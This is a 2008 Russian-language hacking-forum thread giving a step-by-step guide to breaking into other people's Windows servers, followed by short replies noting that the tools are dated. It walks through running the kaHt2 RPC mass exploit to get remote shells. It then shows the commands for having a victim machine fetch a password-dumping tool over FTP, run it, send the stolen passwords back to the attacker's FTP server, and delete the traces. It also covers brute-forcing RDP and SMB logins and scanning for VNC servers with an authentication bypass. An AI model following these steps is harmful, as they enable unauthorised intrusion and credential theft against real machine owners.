Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Безопасность (https://forum.antichat.xyz/forumdisplay.php?f=41)
-   -   Использование экплоита kaht2 и другие методы в атаке на Dedical сервера. (https://forum.antichat.xyz/showthread.php?t=70946)

Xcontrol212 20.05.2008 20:06

Использование экплоита kaht2 и другие методы в атаке на Dedical сервера.
 
1.эксплоит который мы рассмотрим это kaht2...........
Для того,чтобы прваильно заюзать эксплоит нам нужна программа PassViev (только PRO версия):aggressive:,pablos_ftp_server
1.52
ну и сакм кахт2
Для удобства пользования Размещаем софт по винту в определённом порядке. Сам FTPServer, kaHt2.exe и EXPORT.BAT ставим в директорию C:/., А PassViev cуём в папку C:/TEMP (Если её нет, то создайте сами) и переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке.

EXPORT.BAT должен находится в одном архиве с КаХтом, если же всё-таки не нашли то создаём EXPORT.BAT файл своими руками в любимом блокноте с текстом

@Echo off
6.exe Export.txt

и сохраняем как EXPORT.BAT. Всё Батник готов. Заметьте: во второй строке стоит 6.exe, это то имя в которое вы переименовали свой PassViev. Если Вы переименовали в другое то в напишите именно его в батнике EXPORT.BAT.

Теперь давайте настроим FTP сервер на своём компутере. Запустите FTPServer и войдите в User accounts, нажимаем ADD, Вас просят ввести имя юзера, пишем: a. Далее вас просят выбрать каталог куда будут заливатся стыренные файлы, выберете папку темп которую мы недавно с Вами создавали на диске ЦЕ. Потом Вас просят ввести пароль для юзера a, парольставим тоже: a. Потом проставляем везде галочки. Теперь все изменения сохраняем и приступаем к основным действиям.

Открываем диск C:, убеждаемся что там присутствует КаХт. Потом Запускаем командную строку (пуск>программы>стандартны >командная строка). Перетаскиваем КаХт с папки в комндную строку (нажмите на КаХт левой кнопкой мыши и перетеащите в окно консоли).
Далее появляется текст: C:>C:kahHt2.exe
Продолжаем эту строку: пробел
Должно получится: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (пример на моей локалке, у Вас же диапазон может быть другой)
Жмём Enter.
Перед Вами появляется:
PHP код:

KAHT II MASSIVE RPC EXPLOIT
DCOM RPC exploit
Modified by aT4@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
____________________________________________
[+] tARGETS 192.168.0.1-192.168.0.245 WITH 50 tHREADS
[+] Attacking Port135. Remote Shell port32968
[+] Scan In Progress...
Connecting to 192.168.0.8
Sending Exploit to a 
[WinXPServer... FAILED
Connecting to 192.168.0.13

ну короче говоря ещё всякое дерьмо появится которое нам не надо
В итоге когда сканер найдёт потенциальную жертву появится :

Microsoft Windows XP [Версия 5.1.2600]
(
СКорпорация Майкрософт1985-2001.
C
:windowssystem32>

Всёможешь радоватьсяты на чужом компе в директории SYSTEM32.
Далее в консоли пишем:
cd.. Жмём Enter видим C:windows>
cd..Жмём Enter видим C:

Теперь с помощью команды cd program files перейдём в папку С:Program Files.
Видим:
C:Program files сюда мы перешли чтоб особо не палится
Далее узнаём свой IP адрес
Для премера будем использовать мой в локалке 192.168.0.7
Пишем в консоли
:
C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo a>>go.txt 
жмем Enter
Видим
C:Program files>
Это мы с Вами создали текстовый документ (он нам понадобится для соединения с вашим FTP серверомв папке Program files на удалённой машинев котором содержится 3 строки:
open 57.66.158.44
a
a
Буквы a
это имя и пароль которые Вы создали в FTPServer`е.

Теперь запускаем FTPServer , нажимаем на зелёную стрелочку в левом верхнем углу программы. Вам написали, что сервер запущен.
Теперь коннектим удалённый комп к себе по FTP.
Пишем в командной строке:
C:Program files>ftp -s:go.txt
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:

FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.

Это всё означает, что ты всё правильно сделал и законнектил вражеский комп к себе на ФТП, далее на надо залить PAssView.exe (мы переименовали его в 6.exe) на этот комп.
Пишем get 6.exe жмём Enter
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR 6.exe
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee

В консоли Пишем get export.bat жмём Enter - это мы отправили наш батник, видим В своём FTP сервере, в раздел Server Log ты должен увидеть следующее
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR Export.bat
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee

Всё, мы отправили необходимые файлы на комп жертвы.
Теперь пишем bye - это мы отсоединяем комп от нашего ФТП сервера.

и снова мы видим:
C:Program files>
Пишем C:Program files>export.bat это мы запустили export.bat который соберёт нам все наши пароли и сохранит их в файле export.txt
Для больше уверенности в том что export.txt уже создан наберите в консоли:
C:Program files>dir
И Вы увидите все файлы и папки в директории C:Program files, там же увидите и наши закаченные файлы.

И наконец последний шаг.
Снова коннектим комп по ФТП:
C:Program files>ftp -s:go.txt жмём Enter
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
Вы снова увидите:
FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.

Сразу после этого в консоли вводите:
send export.txt
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR export.txt
[1456] 150 Opening BINARY mode data connection for file transfer.
[1456] 226 Transfer complete

Это означает что мы скопривали себе в папку TEMP,которую создавали на диске ЦЕ, файл export.txt

Далее заметаем следы:
пишем bye жмём ввод
И снова видим: 
C:Program files>
Далее поочерёдно вводим команды для удаления закаченных нами файлов:
del go.txt
del 6.exe
del export.bat
del export.txt 

Скачать кахт можнотут

2.Брут дедиков
Как мы все знаем брутер это самый эффективный и тупой метод взлом асек,дедиков and etc
Рассмотрим некоторые брутеры дедиков:
Самый известный брутер для дедиков это Ntscan
Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей).
TSGrinder 2.03
Программа для подбора паролей к MS RDP службе. Поддерживает множество потоков, баннеры входа в систему, l33t преобразование. Программа требует установки Microsoft Simulated Terminal Server Client tool, "roboclient".
DownLoad
Также дедики можно брутить прогой Hydra
3.[/B]Добыча дедиков от Te$t[/B]
Первое, что нам нужно это прямые руки, свежая или чуть пьяная голова =)
FreeCap - Предназначен для соксификации программ не умеющих работать с
прокси серверами самостоятельно. Пару SOCKS-проксов для безопасности, а
лучше цепочку . Здесь я не буду описывать принцип работы с этой программой,
но вы знайте, что все действия я проделываю именно через нее...

Начнем.

Искать мы будем vnc-server т.е. Virtual Network Computing.
Первое что нам нужно, это хороший VNC-сканер, я знаю 2 сканера:
это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner
Свой выбор я оставил за RealVNC Bypass Authentication Scanner,
т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно. Итак скачиваем данный сканер, распаковываем его к примеру в: X:\XXX\ где Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из cmd.exe Пример:
cd X:\XXX - переходим в папку со сканером
Х:\XXX\VNC.exe - запускаем сканер,
где он нам выдаст следущую информацию:
Код:

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
X:\>VNC.exe

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
================================================== ==[win32]==
MAIN MENU
================================================== ===========

[+] Usage: VNC_bypauth <target> <scantype> <option>
[-] <target>:
___________________
|___-p____|___-i____|

[-] <scantype>:
____________________
|___-cT___|___-vnc___|
[-] <option>:
__________________________________________________ ______
|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|

[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations
[+] To increase the speed under linux, try ulimit -s unlimited

X:\>

Осюда мы видим набор ключей по работе со сканером...
Вбиваем далее:
X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p5900 -vnc
где: -i диапазон ip -р порт -vnc Виртуальные сервера
В то-же время в папке \ХХХ\ у нас появляеться файл VNC_bypauth.txt,
куда сохраняются все результаты программы. Открываем и видим:
Код:

---------------------------------------------------------------------------
COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc
----------------------------------------------------------------------------
xxx.xx.xxx.xx :5900 vnc4: banned
xxx.xx.xxx.xx :5900 vnc4: nothing received
xxx.xx.xxx.x :5900 connection closed
xxx.xx.xxx.xxx :5900 vnc4: patched
xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----

из результата видно, что сканер понятным образом сохраняет результаты, где бажные
сервера подписаны как VULNERABLE, с такими мы и будем работать...
Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она
позволяет подключится к бажному серверу, на подобии
Подключение к удаленному рабочему столу(mstsc.exe)

Способ №2

Ищем и качаем программу DSNS v. 1.0
http://i014.radikal.ru/0803/a1/8c7b6b326008.jpg
очень хороший между прочим сканер портов .
Вбиваем диапазон, порт и ждем, через некоторое время сканер
выдает нам много открытых портов =). После окончания сканировнаия, сохраняем
данный диапазон в Results\Export results одним диапазоном, без портов.
Теперь настала очередь программы VNCMASS, в которую мы вбиваем только что
насканеные диапазоны и давим Start All. Программа прочекает и автоматически подключиться к бажным дедикам.. Вот и все.
Советую работать со сканерами через дедики, т.к. вбили диапазон и пошли спать, а наутро подключились и смотрим результаты.

Ссылки на скачивание:
RealVNC Bypass Authentication Scanner
DSNS v. 1.0


(С)Собрал способы DUN

iv. 21.05.2008 00:00

Цитата:

переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке.
Tab клавиша есть. Дальше читать неинтересно. =(

gisTy 03.07.2008 02:23

ТС, ты бы сначала тему топика правильно написал.. вообще то не Dedical сервер, а Dedicated сервер... написано много, но все это уже давно есть.. да и тулзы слишком стары...

cardons 10.07.2008 12:03

Цитата:

Сообщение от NotCooL
есть у кого PassViev (только PRO версия):aggressive:,pablos_ftp_server 1.52?
выложите пож.
а этот способ старый уже?

Он года 3-5 назад был актуальным :)


Время: 21:30